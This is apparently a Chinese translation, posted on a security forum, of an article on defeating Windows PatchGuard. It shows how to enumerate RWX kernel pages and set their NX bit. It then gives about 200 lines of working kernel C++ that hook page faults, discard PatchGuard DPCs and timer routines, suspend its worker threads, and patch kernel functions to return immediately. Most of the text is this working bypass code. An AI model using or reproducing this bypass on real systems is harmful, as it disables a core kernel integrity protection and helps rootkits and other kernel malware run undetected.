[翻译] 通过挂钩 Page Fault 击败 Patchguard-编程技术-看雪-安全社区|安全招聘|kanxue.com

[翻译] 通过挂钩 Page Fault 击败 Patchguard

发表于: 2024-12-16 17:17 2299

[翻译] 通过挂钩 Page Fault 击败 Patchguard

nice667

2024-12-16 17:17

2299

现在，已经有大量关于 Patchguard 的优秀研究，Tetrane 甚至发布了一份长达 61 页的白皮书，介绍了 Patchguard 的所有复杂之处。本文介绍的方法不同之处在于，它实际上并不依赖于 Patchguard 的工作方式，而是依赖于内存管理的非常明显的原则。这种方法的优势在于，它不是要击败 Patchguard 的特定版本，而是要击败它的整个概念。我承认我已经为此苦苦思索了一段时间，但我认为现在是时候与全世界分享它了，经过近 7 年的时间，在这期间我只需要更改一行代码就可以更新它（KiSwInterruptDispatch ）

1：鲜明对比

为了找到击败 Patchguard 的办法，我们只需要了解一件事：它在非图像页面上运行，并且可以动态地解密自身。

只要知道这一点，您就会明白这是怎么回事，因为 Windows 内核与任何其他现代操作系统一样，绝对讨厌Ring 0 中的 RWX 内存！毕竟，这是一场安全噩梦，如果您的驱动程序中有 RWX 部分，Microsoft 将不会对其进行签名。这是一个按我说的做，而不是按我做的做的例子，很有趣！

2：系统 VA 类型

在我们开始设计解决方案来解决这一矛盾之前，我们还应该了解我们心爱的操作系统的另一件事：它喜欢如何安排内存。让我们玩一个小游戏。继续启动 Process Hacker 或任何其他显示内核驱动程序映像库的工具，然后选择一个（非会话）驱动程序并检查其映像库。它是否以接近的内容开头0xfffff803？

不可否认，这不是最好的派对技巧，但关键在于内核管理不同 PXI（PML4/PML5 索引）中的每种“类型”内存。您可以通过查看枚举来了解这一切是如何工作的_MI_SYSTEM_VA_TYPE，其中MiVisibleState有一个名为的简洁小数组，将上部 256 个 PXI 映射到特定类型的内存。这意味着当您分配页面时，即使每次启动时都会稍微SystemVaType随机化，它最终的位置也不是真正随机的。

为了让您了解每个内存区域，下面是枚举的片段：

namespace mi
{
    // [enum _MI_SYSTEM_VA_TYPE]
    //  Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
    //
    enum class system_va_type_t : int32_t       
    {                                           
        unused =                        0x0,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        session_space =                 0x1,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        process_space =                 0x2,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        boot_loaded =                   0x3,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        pfn_database =                  0x4,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        non_paged_pool =                0x5,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        paged_pool =                    0x6,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_paged =            0x7,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_cache =                  0x8,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_ptes =                   0x9,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        hal =                           0xa,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        formerly_session_global_space = 0xb,      // Windows 11
        session_global_space =          0xb,      // Windows 10 v1607, Windows 10 v2004, Windows 10 v20H2
        driver_images =                 0xc,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_non_paged =        0xd,      // Windows 10 v1607
        system_ptes_large =             0xd,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        kernel_stacks =                 0xe,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //maximum_type =                0xe,      // Windows 10 v1607
        secure_non_paged_pool =         0xf,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //system_ptes_large =           0xf,      // Windows 10 v1607
        kernel_shadow_stacks =          0x10,     // Windows 11
        maximum_type =                  0x10,     // Windows 10 v2004, Windows 10 v20H2
        kasan =                         0x11,     // Windows 11
        //maximum_type =                0x12,     // Windows 11
    };                                          
};

这意味着，如果我们排除用于实际内核映像的页面并过滤 RWX 内存，我们最终会得到一个非常小的分配子集，很可能是 Patchguard 或您系统上不幸存在的一些 rootkit。

3：如何枚举

scheduler::call_ipi( [ & ] ( auto barrier ) {
  barrier->up();
 
  // Determine the range we scan.
  //
  auto [range_min, range_max] = get_range( range_per_cpu );
 
  // Iterate all top level page table entires in kernel address space.
  //
  for ( size_t ipxe = 256; ipxe != 512; ipxe++ ) {
    // If ignored region, skip.
    //
    if ( mem::get_pxi_flags( ipxe ) & ignored_pxi_flags )
      continue;
 
    auto rec = [ & ] <auto N> ( auto&& self, uint64_t va, const_tag<N>, size_t imin, size_t imax )
    {
      auto pte = mem::get_pte( va, N );
 
      // Skip if not present.
      //
      if ( !pte->present )
        return;
       
      // If we did not reach the bottom level:
      //
      if constexpr ( N != 0 ) {
        // If directory:
        //
        if ( !pte->large_page ) {
          // Iterate all pt entries:
          //
          for ( size_t ipte = imin; ipte != imax; ipte++ )
            self( self, va | ( ipte << ( 12 + 9 * ( N - 1 ) ) ), const_tag<N - 1>{}, 0, 512 );
          return;
        }
        // If large page, skip if too large to be considered.
        //
        else if constexpr ( N > 1 ) {
          return;
        }
        // Fallthrough to page handling.
      }
 
      // Skip if not RWX.
      //
      if ( !pte->write || pte->execute_disable )
        return;
 
      // Skip if user-mode memory mapped to kernel.
      //
      if ( !is_kernel_va( mem::get_virtual_address( pte->page_frame_number << 12 ), true ) )
        return;
 
      // Disable execution.
      //
      atomic_bit_set( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
    };
    rec( rec, mem::make_cannonical( ipxe << ( mem::va_bits - 9 ) ), const_tag<mem::page_table_depth - 1>{}, range_min, range_max );
  }
 
  // Flush the TLB and return.
  //
  barrier->down();
  ia32::flush_tlb();
} );

这段代码或多或少可以归结为：

启动 IPI，因为我们不想与其余操作系统竞争。
迭代所有内核页面（索引 0x100 到 0x1ff）。
跳过那些不能有 Patchguard 的，我建议跳过 SessionSpace、ProcessSpace、DriverImages、PagedPool 以及最重要的自引用索引，除非你想要三重错误。
跳过不可执行、禁止写入或不存在的页面。
继续并翻转 NX 位。

如果一切顺利，您将在两到三分钟内出现蓝屏，此时 Patchguard 将会自行解密并尝试运行。ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY好棒啊？

4: 如何修复干掉 Patchguard

我们现在需要在 #PF 上进行挂钩。请记住，不再有 Patchguard，所以我们的工作非常简单。您可以切换 IDT 并添加自己的页面错误处理程序、内联挂钩 MmAccessFault，无论您喜欢哪种方法，只要您快速地在我们的 IPI 之前完成即可。

最后一步，即使对 Patchguard 的工作原理一无所知，也非常简单。只需让它蓝屏几次，然后查看转储！您会注意到有几个 DPC，它们都以 XOR 指令和 PASSIVE_LEVEL 上的 worker 开始。我们将永远暂停 worker，而 DPC 只会返回给调用者，而不会执行任何操作。

差不多就是这样了。整个源代码基本上缩减到 200 行，而且不再有 Patchguard。

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

static constexpr bool pgc_debug = is_debug_build() && true;
static constexpr bool pgc_disable_timer_dispatch = true;
static constexpr bool pgc_disable_dpc_dispatch =   true;
static constexpr bool pgc_disable_context_dpc =    true;
static constexpr auto ignored_pxi_flags = mem::va_image | mem::va_session | mem::va_process | mem::va_self_ref | mem::va_paged;
inline static bool is_va_ignored( any_ptr virtual_address ) { return mem::lookup_va_flags( virtual_address ) & ignored_pxi_flags; }
 
// The ISR handling Kernel-mode NX faults:
bool on_knx_fault( void* virtual_address, nt::trapframe* tf ) {
  // If ignored region, skip.
  //
  if ( is_va_ignored( virtual_address ) )
    return false;
 
  // Get IRQL, display details.
  //
  auto* stack = ( void** ) ( tf->rsp & ~7ull );
  irql_t irql = ia32::get_effective_irql( tf->rflags );
  if constexpr ( pgc_debug ) {
    log( "KNX Caught @ %p\n", tf->rip );
    log( "RSP:  %p\n", tf->rsp );
    log( "RAX:  %p\n", tf->rax );
    log( "RCX:  %p\n", tf->rcx );
    log( "RDX:  %p\n", tf->rdx );
    log( "RBX:  %p\n", tf->rbx );
    log( "RBP:  %p\n", tf->rbp );
    log( "R8:   %p\n", tf->r8 );
    log( "R9:   %p\n", tf->r9 );
    log( "R10:  %p\n", tf->r10 );
    log( "R11:  %p\n", tf->r11 );
    log( "IRQL: %d\n", irql );
    for ( uint64_t p = tf->rip; p < ( tf->rip + 32 ); ) {
      if ( !mem::is_address_valid( p ) || !mem::is_address_valid( p + 15 ) ) {
        break;
      }
      auto ins = xed::decode64( ( void* ) p );
      if ( !ins ) break;
      log( "%p: %s\n", p, ins->to_string() );
      p += ins->length();
    }
  }
 
  // Dispatch level or IPI level PatchGuard components:
  //
  if ( irql >= DISPATCH_LEVEL ) {
    uint8_t* bytes = ( uint8_t* ) tf->rip;
 
    // KiDpcDispatch/CmpAppendDllSection clone called from dummy DPCs, decrypts and calls into pg context.
    //
    if ( pgc_disable_context_dpc && !memcmp( bytes, "\x2E\x48\x31", 3 ) ) {
      if ( !mem::is_cannonical( tf->rdx ) ) {
        if ( tf->rcx == tf->rip ) {
          if constexpr ( pgc_debug )
            log( "Discarded CmpAppendDllSection DPC: %llx\n", tf->rip );
          tf->rip = *( uint64_t* ) tf->rsp;
          tf->rsp += 8;
          return true;
        }
      }
    } 
    else if ( pgc_disable_dpc_dispatch && !memcmp( bytes, "\x48\x31", 2 ) ) {
      if ( !mem::is_cannonical( tf->rdx ) ) {
        if ( ( tf->rip - 0x70 ) <= tf->rcx && tf->rcx <= ( tf->rip + 0x70 ) ) {
          if constexpr ( pgc_debug )
            log( "Discarded KiDpcDispatch DPC: %llx\n", tf->rip );
          tf->rip = *( uint64_t* ) tf->rsp;
          tf->rsp += 8;
          return true;
        }
      }
    }
 
    // KiTimerDispatch clone called from KiExecuteAllDpcs, decrypts and calls into pg context.
    //
    if constexpr ( pgc_disable_timer_dispatch ) {
      for ( int i = 0; i < 0x20; i++ ) {
        // pushfq
        if ( bytes[ i + 0 ] == 0x48 && bytes[ i + 1 ] == 0x9C ) {
          for ( int j = i; j < 0x20; j++ ) {
            // sub rsp
            if ( bytes[ j + 0 ] == 0x48 && bytes[ j + 1 ] == 0x83 ) {
              if constexpr ( pgc_debug )
                log( "Discarded KiTimerDispatch: %llx\n", tf->rip );
              tf->rip = *( uint64_t* ) tf->rsp;
              tf->rsp += 8;
              return true;
            }
          }
        }
      }
    }
  } else if ( ke::get_eprocess() == ntpp::get_initial_system_process() ) {
    // Deferred work item?
    //
    uint64_t last_valid_vpn = 0;
    for ( int i = 0; i < 0x20; i++ ) {
      // Validate stack pointer.
      //
      auto* value_ptr = &stack[ i ];
      if ( auto vpn = uint64_t( value_ptr ) >> 12; vpn != last_valid_vpn ) {
        if ( !mem::is_address_valid( value_ptr ) ) {
          break;
        }
        last_valid_vpn = vpn;
      }
 
      // Check if it matches the value we expected.
      //
      void* value = *value_ptr;
      if ( value != &ke::delay_execution_thread && value != &ke::wait_for_multiple_objects && value != &ke::wait_for_single_object ) {
        continue;
      }
 
      // Align stack
      tf->rsp &= ~0xF;
      // Set the arguments on stack
      tf->rcx = ( uint64_t ) nt::mode_t::kernel_mode;
      tf->rdx = false;
      *( int64_t* ) ( tf->r8 = ( tf->rsp + 0x28 ) ) = -0x11F0231A4F3000;
      // Simulate call [KeDelayExecutionThread]
      tf->rsp -= 8;
      *( uint64_t* ) tf->rsp = tf->rip;
      tf->rip = ( uint64_t ) &ke::delay_execution_thread;
     
      // Lower IRQL and return.
      //
      if constexpr ( pgc_debug )
        log( "Suspended PatchGuard worker thread: %llx\n", ntpp::get_client_id().unique_thread );
      ia32::set_irql( APC_LEVEL );
      tf->rflags.interrupt_enable_flag = true;
      return true;
    }
  }
 
  // False positive, fix NX and continue.
  //
  auto [pte, _] = mem::lookup_pte( virtual_address );
  atomic_bit_reset( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
  return true;
}
 
 
// Initializes the patchguard bypass.
//
void init() {
  // Fetch the number of processors and distribute the work.
  //
  static const uint16_t num_processors = ( uint16_t ) apic::number_of_processors();
  static const uint16_t range_per_cpu = 512 / num_processors;
  static constexpr auto get_range = [ ] ( uint16_t range_per_cpu ) -> std::pair<uint16_t, uint16_t> {
    // [ idx*R, (idx+1)*R ]
    uint16_t rmin = uint16_t( ia32::read_pcid() ) * range_per_cpu;
    uint16_t rmax = rmin + range_per_cpu;
     
    // If last range, round to max.
    if ( ( rmax + range_per_cpu ) >= 512 )
      rmax = 512;
     
    return { rmin, rmax };
  };
   
  // Add the patches and call the IPI.
  //
  if ( sdk::exists( ki::sw_interrupt_dispatch ) )
    hook::patch( &ki::sw_interrupt_dispatch, { 0xC3 } );
  if ( sdk::exists( ki::mca_deferred_recovery_service ) )
    hook::patch( &ki::mca_deferred_recovery_service, { 0xC3 } );
  scheduler::call_ipi( [ & ] ( auto barrier ) {
    // .... See above
  } );
}